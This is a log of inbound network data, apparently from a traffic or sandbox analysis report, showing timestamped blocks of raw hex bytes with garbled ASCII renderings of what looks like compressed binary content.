2023-11-18 09:02:40 UTC	7308	IN	Data Raw: 06 e9 c1 69 5c d7 bf d9 84 ad 9e b3 c6 d1 df 32 a7 e3 37 66 78 6e dd 04 ae d9 cd 3c f2 ed 16 e2 99 79 e6 1f 4e 26 3f b5 33 ff fb 64 32 53 23 fd 4f 0b 91 70 37 e7 a7 07 58 3a df 69 85 2e 45 54 fa ff 9e 4c 3d 98 93 bf 7b 32 b5 60 51 fe d8 42 14 71 74 14 66 b4 c4 2c ac 92 f0 0c c7 d9 7a 1a f0 64 07 03 71 92 fe f7 90 0a d7 67 96 93 89 3f 1d c4 25 3e 1d 30 d6 16 e2 45 a7 f0 1c cf 04 ec 21 3f 2b d2 87 51 c3 5a d8 fe 3f a9 71 b5 b1 bf 97 74 b8 5a 39 de 4b 7c 2e 7f a7 79 7c 35 2a 4d 07 e3 c7 25 9c 9f 3a 9a b3 e9 7c a6 2c bb 3a 4f 94 70 84 6d df fc 9a e6 10 9a c7 1a 0f 8a 81 78 34 1a e6 a3 74 f5 37 9e 5b 95 06 27 ce 55 4d 48 78 de 34 16 03 cf 87 24 ce 6e 73 26 4c a9 89 b8 04 2b d3 20 6b 49 d4 31 56 f7 1b 17 ca fe 68 34 84 25 55 c7 bd 8b e7 d0 0d a0 ba 1b 8c 46 94 Data Ascii: i\27fxn<yN&?3d2S#Op7X:i.ETL={2`QBqtf,zdqg?%>0E!?+QZ?qtZ9K\|.y\|5*M%:\|,:Opmx4t7['UMHx4$ns&L+ kI1Vh4%UF
2023-11-18 09:02:40 UTC	7324	IN	Data Raw: 64 60 0c ab 3a 6b 7d bd ef 6c 0a 21 37 25 b0 e6 b5 80 36 a8 85 74 ec a4 ad 67 c4 7a d6 46 d6 26 a8 da 49 91 1d 30 9f a0 f1 fa 04 69 ea 5a 00 c0 7a 00 7e 03 c0 fd 4a 60 27 00 bf 4c 86 7e dc 57 26 37 4a 49 fd 43 19 eb f5 f5 ac 8d 45 27 2a 63 21 f9 db 12 79 6e 62 80 3c ff 2f 52 ce 32 40 59 9d cd 52 75 16 eb 75 27 d7 d6 fb b6 d0 0b c0 cb 93 58 75 16 ab aa b3 98 55 e7 3f 41 94 5f 6f 90 ab b3 54 55 9d a5 aa ea 2c 65 d5 59 75 0f 21 e3 ef 91 aa f3 c3 b5 58 9d c7 b0 3a ad fa 88 c1 49 52 75 de 05 f8 5b ee 91 aa f3 0d f0 1c bb 47 aa ce 1f c0 f3 ef 7b a4 ea 4c fa 3d cc 77 e0 86 1f 53 56 67 5e ff d5 59 b6 8e 49 ba 3c c9 2f 33 59 c6 93 d6 31 a1 cd 48 52 c8 78 fe 3a 26 e3 ae 24 95 8c f3 7b 24 f2 70 e2 94 a4 59 a4 d3 ad 5a 55 ef fb 03 95 e6 97 c9 4c 9a 45 ba 9c 20 69 16 Data Ascii: d`:k}l!7%6tgzF&I0iZz~J`'L~W&7JICE'*c!ynb</R2@YRuu'XuU?A_oTU,eYu!X:IRu[G{L=wSVg^YI</3Y1HRx:&${$pYZULE i
2023-11-18 09:02:40 UTC	7340	IN	Data Raw: b0 b2 a5 47 57 40 f7 13 74 43 0d 20 42 8a 80 fc 6a 94 14 f3 47 01 a9 24 a8 3b a0 4f 47 d3 30 7d 34 e2 c7 aa 88 52 2e cc 37 c7 d0 db 02 b9 34 63 e1 52 69 27 a0 57 8d a5 b1 3a b9 34 2c a2 e0 35 14 a5 3e e0 43 a8 03 e8 42 2e 8d bf 13 94 e6 00 cb 1a 27 85 4e 2e 6d 0e 21 79 40 fe 48 d2 7d 40 02 84 14 02 e9 3a 5e 8a d3 40 70 05 ec a1 14 dd 27 48 b1 67 3c 10 ba 87 d2 1e 80 1e 9d 28 c5 9f 26 02 52 1f 14 4a 7b 01 fd 88 90 97 80 62 83 4a 69 5f 40 6b 2e 91 e2 26 72 69 2b f8 b3 40 e9 00 80 7b 09 d8 01 70 ac 90 3d 5d a8 60 57 4d 92 62 26 b9 b4 f0 37 8a 9e 5c f3 76 11 f8 0c 14 cb 08 49 77 53 3e 3f 54 2b c5 b5 b5 c8 05 21 cb 9c 5d c8 e6 d8 64 29 9e 98 0c 84 b2 af 2c 01 d0 cf 2f 95 e2 27 97 e2 e6 85 ec cd 99 b7 83 a4 17 2f 55 c5 63 5a cf 52 ce a5 34 75 aa 14 c3 c9 a5 b7 Data Ascii: GW@tC BjG$;OG0}4R.74cRi'W:4,5>CB.'N.m!y@H}@:^@p'Hg<(&RJ{bJi_@k.&ri+@{p=]`WMb&7\vIwS>?T+!]d),/'/UcZR4u
2023-11-18 09:02:40 UTC	7356	IN	Data Raw: 83 1a 27 41 a9 d2 fa 0a a4 06 0d 5b 55 69 7d 2f aa 55 d1 aa 4a eb 3b e5 a2 20 fd b3 55 ff 58 17 65 35 55 69 fd 5f a7 ed b4 2a ad ff 5d 0b 62 7e 3a e8 3f d3 6d 0d 64 06 f9 7f 89 35 13 55 5a ff a8 9b 32 72 aa b4 fe cf fe 3f 7b 57 1a 63 c9 75 95 eb 75 f7 eb ee e9 d7 ef 75 d5 7b 55 af ea be a5 df eb 7d df 5f f7 f4 2c 9e 7d 1f 8f 97 89 1d 4f 20 ce c4 b3 d8 9e cc c4 1e cd 4c 6c 93 20 61 0c 22 38 02 14 12 3b 26 20 40 01 14 c7 c2 89 b0 2d 82 13 41 64 85 1f 2c 11 08 85 58 c8 02 81 94 88 c8 02 92 40 40 18 07 11 51 b7 6e dd aa 73 ce bd 55 dd 3d 5e 32 f1 4c cb b3 dd ef d4 76 cf 39 df 3d f7 d6 ad cf 10 d4 a8 d2 9a af 43 03 29 3d 6b 9e ca c6 ad 58 95 d6 7c 0e 40 8a 2a ad 59 e8 04 28 54 a5 35 4f 51 24 54 a5 35 ff 05 02 8a 2a ad 79 b1 0b c2 61 63 ad 1b 34 2a 8a b2 e6 c8 Data Ascii: 'A[Ui}/UJ; UXe5Ui_]b~:?md5UZ2r?{Wcuuu{U}_,}O Ll a"8;& @-Ad,X@@QnsU=^2Lv9=C)=kX\|@Y(T5OQ$T5yac4
2023-11-18 09:02:40 UTC	7372	IN	Data Raw: d6 94 ce 5a 7f 09 a3 71 e6 28 a2 56 74 a1 a3 a5 39 86 d6 6b fe 71 a0 b5 ed ff 0c 5a 1f 3e ec 41 2b c0 75 0f 0d f3 3e 1d 84 bc a7 97 fc 55 e0 fa 6c 51 70 7d 82 46 7b 04 66 83 21 a8 d2 0f ae f3 01 42 87 0a 00 75 54 1e 50 47 f5 07 54 2c 12 27 18 40 ad ee d6 a3 9d ac 8e 91 18 9c 4a 75 11 9c 4e 29 84 d3 13 83 c2 69 93 81 d3 85 06 6e d4 4c 8b 61 34 c3 30 ba dd 0f a3 a5 79 18 ad 00 8c b6 6b fd 05 fa a2 97 cb ee 0f a3 ca 78 44 19 a6 b6 05 c7 5b a7 a4 c7 e2 43 8a eb bb d7 c5 8b b4 5a c5 30 56 26 30 f6 ae 31 80 b1 6b fe ce e6 f8 ef b8 2a 3e 82 05 56 d5 5f 1e 62 58 cd b3 b3 41 6d fb b9 94 81 90 fa 36 6c fb 5d 76 aa 0a 6d fb fb 1d 16 e8 6f e7 7f 13 41 fb 3d 8e 05 2f 35 b4 de 1c 23 e7 26 b4 aa 62 31 77 3d 9c 68 8f b2 d5 6f f6 66 28 ad da 8a 87 38 f9 37 21 2b 95 a2 37 Data Ascii: Zq(Vt9kqZ>A+u>UlQp}F{f!BuTPGT,'@JuN)inLa40ykxD[CZ0V&01k*>V_bXAm6l]vmoA=/5#&b1w=hof(87!+7
2023-11-18 09:02:40 UTC	7388	IN	Data Raw: de 0a 48 09 bb 3a f9 e2 aa 71 f0 2b d9 48 d1 21 ba 7c a6 ae a9 e7 a3 bf 59 a3 aa e4 b5 4d c0 ff 57 41 ff fe 4c 7f 84 64 fb 9d d2 50 e8 66 7a 5d e5 bd 9c dd 12 a7 60 6e ac f6 8a 58 28 10 d8 64 92 6b 29 fd 57 94 6f 4e cc b9 29 38 27 56 7a a3 9a 13 ab 38 14 a2 6c bb 62 a3 e8 77 47 24 56 31 e7 8b b1 d2 39 cf c5 9c 39 cf c7 42 f5 d1 eb 38 3d b8 2e 56 45 41 8a 5e cf f7 bd be 34 3a b7 5f ca bc 68 60 bf 5b 57 e5 ec 96 f7 48 5d 37 a0 ae 9b d4 dc 58 c5 8d 54 57 d5 21 3d 2f 36 6d 73 6c e2 dc d8 b4 06 fe 5d ca bf cb 22 54 c9 17 a9 01 cf 51 79 cf 53 79 5f 8a 85 e6 46 d7 f0 bb 2b f9 57 be b9 da 97 22 bf 8b f8 77 17 ff 7a 63 f0 70 7c 76 cb 44 1e 83 8a ab 31 06 6e fa 6b 94 3e 52 c6 66 45 2c 54 7c 1c 87 51 da 02 0a 5f 4a 36 b5 2c e2 bc d3 0e c4 aa 16 c4 a6 cd 8d 85 06 1b Data Ascii: H:q+H!\|YMWALdPfz]`nX(dk)WoN)8'Vz8lbwG$V199B8=.VEA^4:_h`[WH]7XTW!=/6msl]"TQySy_F+W"wzcp\|vD1nk>RfE,T\|Q_J6,
2023-11-18 09:02:40 UTC	7404	IN	Data Raw: 69 a0 ed 75 43 89 fc 83 7c d4 06 3c 50 81 a9 f4 1c fa eb 18 5c f0 ed b7 83 4d 0a 37 0e 8c 58 22 75 1f 1f c5 be 96 c9 59 e4 10 43 50 9b 9e b6 52 08 4e 8b c5 9e 0f 44 13 70 ee 22 8b 0f a3 9c 1f 5a cb d0 c9 28 f7 a4 6f f9 80 5e 84 bb b1 37 e1 7e 1c 92 e8 f4 de 24 ba 3a 24 46 8d 3e 61 23 76 17 54 09 db 72 38 41 27 f3 b9 ed 7a ff 64 9b ba d4 99 04 e3 d9 7e 82 0f 62 02 db 4f 90 54 53 53 46 92 2f 39 4a bc 82 98 c8 17 91 02 6e 35 64 33 60 a9 61 99 1b f3 97 4a be c8 1e 99 3a cd 64 a3 59 73 64 42 01 b1 81 ed 01 9b 07 89 d7 cd 92 57 b2 47 46 87 f2 a7 e0 e7 0c e1 3c 3b f3 00 ee 22 92 5e ae 93 bd 87 06 70 e7 07 cc 0c 40 e1 cf c7 b4 e0 17 f1 ca 61 71 7f 13 59 bc 6a b2 d6 82 fc ec 38 8a 79 35 55 a0 ef 27 ac 1c cc f4 18 c2 29 42 57 48 f4 a0 a3 ed 89 ef 92 bb 9d 65 06 b8 Data Ascii: iuC\|<P\M7X"uYCPRNDp"Z(o^7~$:$F>a#vTr8A'zd~bOTSSF/9Jn5d3`aJ:dYsdBWGF<;"^p@aqYj8y5U')BWHe
2023-11-18 09:02:40 UTC	7420	IN	Data Raw: f5 11 1f c8 e6 72 57 14 f0 6e 72 34 0c f0 84 49 e7 c8 a8 19 e6 f7 e4 15 0e 20 4a 0c 03 30 6d 40 82 06 d7 17 a5 a9 b8 c7 79 07 2c 78 d6 7b e2 e2 aa a8 25 57 5a 81 9d 84 02 3c 4f b7 31 03 bc 4e 2a d5 eb 3c e8 55 e8 88 58 80 b4 1f 31 69 01 ff 40 9e 1f 01 ce 20 6d 05 44 5a cb 0e 60 3b ca ad e4 5a 8c 21 3e 93 dd 69 0b 0a 60 58 cf a5 21 bc d8 e7 cb 01 80 1f 50 f0 70 d0 e5 79 94 2d 13 a5 9b 8a 51 09 38 8d e6 7e d3 54 04 a3 fe 8f b0 5e 0e f8 06 f5 bf a9 a9 42 5d 45 eb 7d 53 51 15 6c ea 89 60 53 51 15 8c 7a e6 08 1d bc 6e a5 6b f8 3d 66 de 70 15 97 70 15 97 38 1a 37 a0 8e 4b c9 52 b3 d4 11 b6 01 f5 dd c0 f5 dd c0 6c 86 f0 ee 50 3b a6 11 c1 1b 4a 37 a4 d9 67 82 07 4d 7a 83 fe 26 b3 64 42 4e 0b f8 8a 9d 33 bc 55 5a 34 d5 5c 56 e3 5f c7 43 58 31 c5 1e e6 3c 85 62 cc Data Ascii: rWnr4I J0m@y,x{%WZ<O1N*<UX1i@ mDZ`;Z!>i`X!Ppy-Q8~T^B]E}SQl`SQznk=fpp87KRlP;J7gMz&dBN3UZ4\V_CX1<b
2023-11-18 09:02:40 UTC	7436	IN	Data Raw: d8 ce d6 46 d0 ef 29 29 d6 ab b3 a2 cc 8c 69 04 07 ef 8d 3e 5b de 6e 20 82 6f 88 08 aa 21 fb 87 cf 23 35 ba 24 ea f6 ca bb 61 e3 ea a2 55 c3 7f 15 d5 de 2e 5e fb 85 75 5b ab 31 da 40 3e 7b 0d a8 b1 4b a8 51 13 b2 d1 b6 03 9e 5a ba ea ab f1 37 ca a8 73 45 3e 83 58 33 44 3e 83 b8 7b 27 b2 fb 3b 2a 53 5c 7d b9 cd 5e 52 35 93 93 af a9 e4 2c ad ce fe f6 90 5f 9e ae ad 53 bf 18 ea 5c 10 d4 b9 4f c4 1d 03 4e 18 d0 39 3e 85 e9 5c 3e 53 fb 13 a2 d2 2e 07 bd bb bf be ce 69 b0 f1 88 d9 e9 40 90 c1 fb 38 19 05 62 fb 94 93 89 39 74 0e 16 57 75 1a c8 26 51 8e 1d c4 2c ca 59 9e 43 f3 5e 4e 56 81 a8 83 78 39 6b 41 56 8b 72 76 82 a4 88 72 3e cb a1 cd f0 38 f1 11 19 ce cb 89 cb 45 7d a2 9c 1e 20 4d 82 5c 0e e2 6e e4 64 04 88 f3 5a 31 6a 81 d8 c5 55 65 20 87 04 59 92 4b 43 Data Ascii: F))i>[n o!#5$aU.^u[1@>{KQZ7sE>X3D>{';*S\}^R5,_S\ON9>\>S.i@8b9tWu&Q,YC^NVx9kAVrvr>8E} M\ndZ1jUe YKC
2023-11-18 09:02:40 UTC	7452	IN	Data Raw: f2 96 02 5e c6 8d 32 a6 e1 5c 16 40 9c 85 62 2f fc 03 5d 35 52 23 4f 7f 6b 28 ef 85 61 c7 f3 39 6a 2e ce 6f 89 6d 6f 7c 73 a1 ae 4f 82 8b 9e 08 8a 98 8b 0c 03 b9 18 2e 72 31 4a 7b b2 a5 6c a5 de 5b 14 3d 17 f8 09 05 55 31 8d 3a 55 a6 51 e8 09 5b 9b 90 82 bc 92 07 1c 63 b8 e4 17 e7 e5 05 84 14 e7 e5 e4 5a 1d 3c 17 fb 28 cb 42 0e 53 2e ee e7 d9 f9 95 c6 45 33 ed b8 08 ae 33 b5 fd 28 42 69 89 6b 2e 14 75 e9 09 36 45 3b 03 86 9a 8b 2b 0d e4 e2 31 91 8b 31 85 da 5c 34 3f 80 76 dd af 3f 2e da a2 8c a9 38 14 d5 31 85 8d b9 f0 08 a1 c8 2b 0f 72 a1 0c 3a 84 34 e6 e2 21 1e f9 4b 51 b3 7d 1c 97 ab 21 96 c7 79 2e 6e 3c 40 07 da 61 b9 b8 3f b4 3f 4d 55 94 c1 71 cd 85 3d 94 0b 5f d4 71 61 35 90 8b e7 42 b9 18 46 47 12 da 4d 94 d2 1f 2d b5 3e 1e fb 58 22 58 86 96 f5 4a Data Ascii: ^2\@b/]5R#Ok(a9j.omo\|sO.r1J{l[=U1:UQ[cZ<(BS.E33(Bik.u6E;+11\4?v?.81+r:4!KQ}!y.n<@a??MUq=_qa5BFGM->X"XJ
2023-11-18 09:02:40 UTC	7468	IN	Data Raw: 70 1a dd eb 57 c5 98 ea 2d 17 c5 7b a2 ec 97 a6 aa f6 f0 0d 5a 0f 1f 19 37 f9 90 85 e4 8b 45 f2 84 32 f9 6a d4 d4 de de 3c f9 8f 51 26 d0 81 e7 b3 87 12 eb a4 cf 27 b6 1c da 1e 57 e3 78 cf 36 d7 57 3e ad f7 ab f9 54 c4 cd 67 bb 85 7c 26 d5 e6 93 93 e1 ce c9 ce d1 dd c9 3a 82 9a 7a 3b 9b e7 73 8a 7a 66 17 9e 4f a3 e9 74 27 54 9f 4f 6c 39 b4 3d dd 9b fc 92 63 24 2b f9 54 ed e7 77 fa 6c 75 7f e9 d5 42 3e b3 44 3e 79 39 fa 3b 7d ad 50 d3 40 8f f8 f9 68 d7 01 7a a8 75 2f 51 92 55 77 b5 5e 67 2d d4 6b a1 a8 57 a5 e1 35 9b ce a8 97 ed 06 f3 76 ef 85 32 91 fd 86 d9 d8 6e 50 6b 7a 3c 85 3c 19 35 d5 ce 6e b4 56 56 52 e2 7e 4b f4 fb c4 69 2c e5 69 e4 e4 67 f7 e9 a5 fb 0a 03 a5 d1 33 71 2b c7 ca d0 ba 72 53 92 dd ca 1d 2d d4 6b 2d af 57 b9 b1 5e 43 50 2f 5f 46 e2 7a Data Ascii: pW-{Z7E2j<Q&'Wx6W>Tg\|&:z;szfOt'TOl9=c$+TwluB>D>y9;}P@hzu/QUw^g-kW5v2nPkz<<5nVVR~Ki,ig3q+rS-k-W^CP/_Fz
2023-11-18 09:02:40 UTC	7484	IN	Data Raw: ab f0 57 db a6 f5 b2 ea a9 de 5c b7 7b a6 af bd 03 2f 67 0d 16 5e b6 64 c8 1b a9 ef 4f 65 be 73 1d 5c c3 f5 b9 17 47 05 9e e2 59 eb 71 90 a8 20 2f 83 04 37 72 9d ff 4d aa 0a b2 8f c8 1a cb 8a f4 53 86 ce 30 eb dc a4 3a c7 94 97 f5 52 dd ee ae 74 2f 07 3a 77 10 3a 9b 57 76 70 cd d8 1b fa 6c 4c af 73 01 6c 46 af e5 3a 0f 04 a9 df c8 55 bd 08 24 f4 8c 18 5f 54 b2 20 37 80 c4 05 09 81 b8 37 71 b2 06 24 bc d6 ac 7c 74 a3 b1 1f 80 e2 ab 49 95 f7 ac e5 79 2c f5 dd ed c1 0e 94 ef 27 94 9f 36 2e 60 8a f0 97 d1 53 ef a6 cc 11 1e 7a 9c 2b ff 01 8e f2 09 c5 f6 82 4c 10 36 87 40 ca 36 71 ef b4 ee 83 6c f3 2c 27 a7 82 04 9e e3 e5 94 82 84 04 19 09 b2 4e 94 5c 09 a2 3d 61 d9 61 bb 49 79 a7 06 ff 70 7a d3 7a 47 b5 47 1f 63 b9 3a 56 de 29 73 e0 1d 9f f0 4e b5 79 99 4d 9b Data Ascii: W\{/g^dOes\GYq /7rMS0:Rt/:w:WvplLslF:U$_T 77q$\|tIy,'6.`Sz+L6@6ql,'N\=aaIypzzGGc:V)sNyM
2023-11-18 09:02:40 UTC	7500	IN	Data Raw: 38 f1 a5 a5 13 a4 7c 30 5f 27 14 92 1c cd 31 5c 09 89 10 fd 7d 37 e4 d2 61 be 4e 3e c4 d7 45 7c 57 00 51 6f 8a ef 0a 20 66 2e b5 28 9f 1b cf 47 4d 75 5c e6 9e 90 d3 43 b8 a6 a3 21 fd 92 b8 84 ee f3 b5 bf 72 c0 57 8e 82 bc 9a cd fd 3d 15 52 af 98 23 9f 0d f1 b3 e2 d9 aa 08 92 2c e2 5c 0e b1 78 c7 fd fd 15 e4 61 1b 96 66 51 c8 ba 5c ae 69 9f 28 ed 5f 9e 65 19 07 c9 33 e0 7a f9 40 f2 af 71 b6 2c 81 ec 1e 27 d6 d8 10 c3 fb 3c d2 1e 8b d2 fe 0a 04 c7 b9 04 f2 cd 2b 2e cf 53 c8 dd d6 2c 0d 16 60 65 75 8f f7 2a 2d 21 66 a2 17 7c 01 c9 79 cb e3 aa 0d 24 ad 2f cf 9e ae 10 9f 03 dc 16 73 17 e8 cf 7a 1b 20 2b 4c b9 37 1d 82 34 de cb ad f3 33 c4 ba 8c 4b f8 10 92 24 be f3 34 5e 88 35 e4 08 f1 66 04 d2 68 01 af 7b 87 2e e4 bb ff f5 bd 8d bb 7b b0 d9 7c 5e c9 8c c5 31 Data Ascii: 8\|0_'1\}7aN>E\|WQo f.(GMu\C!rW=R#,\xafQ\i(_e3z@q,'<+.S,`eu*-!f\|y$/sz +L743K$4^5fh{.{\|^1
2023-11-18 09:02:40 UTC	7516	IN	Data Raw: 8f cc 84 a6 b5 ec aa 75 a5 1f 59 f8 f6 b8 78 0e e6 4b 02 d0 7e a5 46 a4 2a 08 e2 ca 57 00 e8 f5 12 11 9c d3 d7 d2 26 0f 7d 43 49 ed 1b 6c 91 9c 3c 7a 3d 48 c8 01 1a 86 c1 aa cb 08 36 a6 14 56 e9 61 c4 76 69 b1 35 80 94 2a d4 aa c6 1c 31 b7 71 36 e9 8e b2 21 da d3 5b 94 bf 86 4f 97 57 f3 49 8e 79 b6 0c 08 6d ae 28 66 89 06 4c be c8 dc 55 91 63 9e 2d 03 22 30 37 bf 48 35 e6 17 64 ee fa fc 2a c7 3c 5b 06 84 36 37 bd 4a bd b3 18 9b 9b 66 99 67 cb 80 d0 e6 e6 45 9a 3d 16 63 73 f3 69 8e 79 b6 0c 08 ea 4b ce 19 c3 39 b4 cb d3 18 77 99 93 e0 f3 8b 2c ee dc 8d 71 17 af 24 83 8e 0f 45 09 08 92 1d 02 5c 00 41 b1 85 00 57 a0 fc da c0 f6 ee 7a f8 a6 ce 71 4d bf 8b c4 4b 0d 37 12 34 66 84 56 46 5d 03 db f9 60 55 af 31 68 21 37 fa 59 c8 05 4b 23 41 dc 0b f3 21 da 40 5b Data Ascii: uYxK~FW&}CIl<z=H6Vavi51q6![OWIym(fLUc-"07H5d*<[67JfgE=csiyK9w,q$E\AWzqMK74fVF]`U1h!7YK#A!@[
2023-11-18 09:02:40 UTC	7532	IN	Data Raw: 74 67 a3 20 72 0f 21 9c 72 6f 20 f9 eb cf 5d 86 b1 85 80 27 53 e2 d4 db 6c 21 76 3b 95 92 16 a8 af d9 d6 c0 f0 62 16 bc a0 01 26 6b 49 f3 07 4b ce 2f 52 aa 71 a3 f5 09 7c a1 e9 d3 c7 3f c0 b8 0c e9 76 34 1b 89 63 f1 03 c9 51 23 0c 4a 16 1d 68 d5 fa 01 3e 56 3d 0c d5 7d b8 43 88 ed 7a 80 a8 58 34 03 b9 8e 41 b1 d0 14 75 c1 31 90 82 ae 60 1d 01 c3 6f b8 b6 b6 ee db 77 c4 88 5a 34 c9 3e d5 b0 4e 26 34 68 28 32 d8 be a4 8f 95 45 8a 2a 5b 76 be 1e c0 54 f3 b4 d5 0d 5c 58 73 36 39 9e 42 88 80 bf e9 6a fb f8 8d b2 c9 04 1c b2 52 bf b8 45 84 4f 0a 87 f0 53 ad 32 4c a8 33 fe 5c 5c a9 3e 63 8b 8c 60 2a 70 0c 53 ad 18 87 38 e9 f3 f9 17 f1 62 42 d8 bf 97 1c e5 5f 4b 1e f0 6f 25 d7 7e b2 e9 10 e0 90 5c a2 fd 61 46 90 34 1e d6 93 80 0b 98 16 eb a4 49 00 41 bc 6a 63 53 Data Ascii: tg r!ro ]'Sl!v;b&kIK/Rq\|?v4cQ#Jh>V=}CzX4Au1`owZ4>N&4h(2E[vT\Xs69BjREOS2L3\\>c`pS8bB_Ko%~\aF4IAjcS
2023-11-18 09:02:40 UTC	7548	IN	Data Raw: b7 d2 92 7e 8e fa 86 79 21 93 c3 69 6b 9e 4f 99 f4 2b 87 33 09 ee c9 02 d2 a8 b3 00 92 c6 d6 9f 95 b0 65 ce 00 87 79 f9 93 f8 ea 9b c3 b7 f8 f6 c0 0b 43 6b 8a e4 41 a0 a1 9b c1 aa ec 82 12 6b f8 6b 80 25 e3 dc 96 8e 15 80 4c a4 34 38 a5 91 84 42 97 38 85 2e bc 79 29 e6 e7 ed 61 33 c1 f0 40 54 86 59 29 9a be 12 26 b9 00 4b 3f c5 b2 11 50 5b fb 58 80 66 d0 7c 88 37 64 40 ed c7 e0 b0 9f 06 d3 a0 04 95 bb d7 bd 0b bd 50 7c ae b4 65 c6 86 f4 6c b0 b9 db 1e 5f ea ee e5 36 26 64 94 b0 e8 c8 a7 66 07 2f aa 21 99 cb af 37 78 b9 58 ec 81 f0 05 74 57 2c a4 b0 a8 ba 0a 6c 23 5a 61 04 22 af 22 a3 dc 79 d3 3b fc 52 5e ad a8 7a 0d 3b aa 60 73 99 43 85 7d e4 5b ad f6 9f fd 0c d5 6a 5f ff b8 7e d8 45 fc 91 8b b6 6e a6 93 79 e2 86 c2 1a 7f 95 b4 4e bb c0 07 f8 43 a3 57 1a Data Ascii: ~y!ikO+3eyCkAkk%L48B8.y)a3@TY)&K?P[Xf\|7d@P\|el_6&df/!7xXtW,l#Za""y;R^z;`sC}[j_~EnyNCW
2023-11-18 09:02:40 UTC	7564	IN	Data Raw: e0 56 c0 34 aa 9e 0e 8b f9 33 41 6c b0 e4 04 f3 3d 28 6f 08 94 9f f5 e3 99 5e f5 ec 81 d3 63 fd 20 55 e0 07 fc 1d 5c b0 1a 49 16 82 f2 35 46 52 4e d6 a5 38 bb 32 2d eb 57 4b 65 5a d6 39 9f db 13 3b 9c 1a df ed a1 71 d7 90 6c 3c fc 73 b6 6f 2c ce 08 45 e2 ea 34 c0 60 13 21 ad 59 6a 59 62 c8 95 f2 c5 4b c9 8b aa 71 8a 6a d5 13 f3 58 72 ad 78 c0 0b b6 bf 60 39 b0 b1 c0 d0 a7 91 aa f2 7d dd 6c 5e b5 92 aa aa 11 9c b2 bc 2a e5 3f 19 26 ce 8b 22 c8 84 d8 91 51 64 ad 21 71 de c0 7f 67 86 22 1b 2f 62 cb 70 cb 30 d3 88 5c 2c 40 fb f2 68 eb 8f 27 37 04 53 20 84 3e b8 54 c6 60 0b 42 59 06 2f 63 30 66 40 59 26 2f 63 b0 66 86 82 5e 01 2e cb e3 00 0b cd 5f dc b2 5e 50 a9 3e f1 9c 4c 99 98 8c 1e 89 3f 7f 27 f6 1c 94 25 77 ed b2 a7 1d ad 02 38 61 1f bc a4 90 9d b6 03 81 Data Ascii: V43Al=(o^c U\I5FRN82-WKeZ9;ql<so,E4`!YjYbKqjXrx`9}l^*?&"Qd!qg"/bp0\,@h'7S >T`BY/c0f@Y&/cf^._^P>L?'%w8a
2023-11-18 09:02:40 UTC	7580	IN	Data Raw: fd a0 47 9c bb 07 c0 a4 4c 59 b0 5e fb 82 fd f2 21 0d fa 4d 04 6f b4 93 1e 20 b2 a1 f7 d5 d0 56 6c 48 59 82 04 31 c6 2f 37 a2 a7 01 e4 b3 01 90 91 03 f6 bc 13 d9 4a 94 35 79 01 f1 98 76 e6 68 86 db 23 07 71 7c 06 ec 71 5b f4 f3 80 1f 93 81 e5 d5 24 1e 7f 1c 81 6f 74 e4 92 29 17 c5 5c 63 ef 45 09 d7 42 dd 34 7d 1c 83 c5 0f 6a 5a 92 c0 ae 94 c6 27 2d 7b aa ef 3f 68 8a 63 d9 03 2f cf d7 2e e8 8d b5 86 74 7b 24 af 30 00 6b 0d 6d 98 97 60 c3 bc f2 89 61 07 75 8f 1a 90 ce c3 41 49 24 8a 98 1e 88 95 8e 97 13 8b 99 c3 fb 50 5a 1b 1d d3 81 d9 a4 0a fd 98 32 f3 85 39 9a c6 c6 8e 33 02 ae b2 ad e8 4e 31 1a a3 3c d2 d1 77 25 68 f4 ef 67 d3 01 97 7b ad 25 97 25 7f 7d 7a af 3c d1 db 88 6e 31 15 98 82 11 48 d1 b8 d7 9f 2b ad d1 ca b8 14 fc 9d 05 69 31 bb 0d 91 f1 5e a0 Data Ascii: GLY^!Mo VlHY1/7J5yvh#q\|q[$ot)\cEB4}jZ'-{?hc/.t{$0km`auAI$PZ293N1<w%hg{%%}z<n1H+i1^
2023-11-18 09:02:40 UTC	7596	IN	Data Raw: 23 85 06 a0 51 bb 0e c7 f1 2a 1a 95 5f 61 61 eb 88 9e 57 52 c6 1d fb 1a dc 06 78 a9 09 4a 78 13 bc fb a5 f8 be ba cc 24 de d9 76 67 bb c2 fb 1a 64 65 0d f2 9e 9d 96 77 1c aa 53 15 de d7 0c 91 f7 e0 f4 74 7c af 4f c5 f7 28 c9 77 ac 40 32 0d 34 79 a6 8d a9 32 b5 7f 21 32 a9 9d fc f0 8f 1d e0 68 42 69 95 5b 0f c1 3d 35 df a1 03 ee 77 b4 4b a3 6b 50 a1 51 b2 51 98 4a b8 39 02 03 e2 2d a1 60 eb 7e fe 4d be 0f ad e8 88 61 4b 03 4e cf 7b 34 8e 1c 70 19 f9 22 cf c0 92 13 f4 34 b0 e8 5a 31 46 63 95 8a b1 c6 7d c8 81 89 1c c0 25 4f 18 11 bd d9 3c 22 86 be 58 c4 2b af d1 05 fa 28 88 60 a2 31 84 7f 08 5e 82 ba 2e bc ec ee 14 65 63 5a ba b9 76 da db c3 35 72 1d e8 c3 06 ba eb 02 16 fb b1 22 66 16 22 ae 0f 0f f9 6a b7 b1 2e 80 b0 ea ce f1 c6 81 0f 8f 1b 6d a8 e9 47 8a Data Ascii: #Q*_aaWRxJx$vgdewSt\|O(w@24y2!2hBi[=5wKkPQQJ9-`~MaKN{4p"4Z1Fc}%O<"X+(`1^.ecZv5r"f"j.mG
2023-11-18 09:02:40 UTC	7612	IN	Data Raw: d6 37 7e 4f 4a 8e b8 3c 1d 7d be 13 c9 d6 ff 1b 48 f6 f8 d7 52 8c 0b 2e 07 f9 21 68 7a 3f f7 6d 6e 88 11 dd 5a 7c 78 fb f7 50 a1 9b 61 6e fa 52 bf 85 84 e4 fb cf 75 e0 82 e8 3e dd 93 ef 79 e1 69 e0 1a d7 39 50 07 1f 82 aa b9 77 00 3f ba 8c 53 44 99 aa f8 ec 02 32 df bc 2b 18 de cd e0 03 2a 48 13 ae 45 6a f0 a7 fc 46 64 c8 24 13 b7 3a 7d 5c 22 15 9d f4 3b 09 0a f1 52 2d f2 88 ec 2b a8 89 06 e8 cf 5c 68 66 b4 52 5f d0 46 73 05 67 4f 99 8e 82 8c e1 f2 f7 7f 0d 6a 36 a4 89 be 36 d1 6e 62 03 16 a8 98 04 94 60 93 5a bc 8b 43 75 93 8e b9 7e 31 00 21 79 ef 34 7d 62 00 e1 01 6f 51 08 d5 27 99 c9 b9 4b c7 35 c7 80 5d bf 46 8b ee 09 3d 88 31 b9 6b a0 1f fc 05 c7 e9 84 c9 3c ef 4a fa de c2 73 17 dd 5b 71 e0 02 cb 0e 52 16 59 88 df 67 3b f1 cf 3e 